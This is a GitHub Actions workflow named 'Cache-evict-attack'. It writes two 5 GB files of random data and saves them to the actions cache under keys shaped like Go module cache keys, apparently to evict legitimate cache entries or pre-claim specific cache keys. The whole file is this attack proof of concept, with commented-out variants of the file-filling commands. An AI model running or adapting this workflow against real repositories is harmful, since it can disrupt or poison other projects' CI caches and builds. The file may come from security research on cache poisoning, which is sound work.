name: Cache-evict-attack

on:
  workflow_dispatch:
  push:

env:
  GO_VERSION: "1.18"

jobs:
  evict-cache:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 0

      - name: Restore go cache
        id: go-cache
        uses: actions/cache@v2
        with:
          path: |
            ~/go/pkg/mod
          key: ${{ runner.os }}-go-${{ env.GO_VERSION }}-${{ hashFiles('**/go.sum') }}

      - name: random data
        run: |
          head -c 5G </dev/urandom > randomfile
# head -c 9739172470 </dev/urandom > randomfile
# dd if=/dev/zero of=./randomfile bs=4k iflag=fullblock,count_bytes count=10737418230
# echo "aaa" >> randomfile
# fallocate -l 5G randomfile

# head -c 10737418230 </dev/urandom > randomfile

      - name: Evict cache
        id: evict-cache
        uses: actions/cache@v2
        with:
          # upload-chunk-size: 10737418240
          path: |
            randomfile
          key: ${{ runner.os }}-go-${{ env.GO_VERSION }}-01a44cbc7b0660238c2867d8cd80082a0eb421d53b23a650adaf4a4eced68c47

      - name: random data
        run: |
          head -c 5G </dev/urandom > randomfile2

      - name: Evict cache2
        id: evict-cache2
        uses: actions/cache@v2
        with:
          # upload-chunk-size: 10737418240
          path: |
            randomfile2
          key: ${{ runner.os }}-go-${{ env.GO_VERSION }}-beee752ea7fce7a3b0cc9a27a483de120a8adf67eb8bdb1c36794f2aea76f375

      - name: Evict cache3
        id: evict-cache3
        uses: actions/cache@v2
        with:
          # upload-chunk-size: 10737418240
          path: |
            ~/go/pkg/mod
          key: ${{ runner.os }}-go-${{ env.GO_VERSION }}-${{ hashFiles('**/go.sum') }}

      - uses: actions/setup-go@v2
        with:
          go-version: ${{ env.GO_VERSION }}

      - name:
        run: |
          go mod tidy
          ls -lh ~/go/pkg/mod
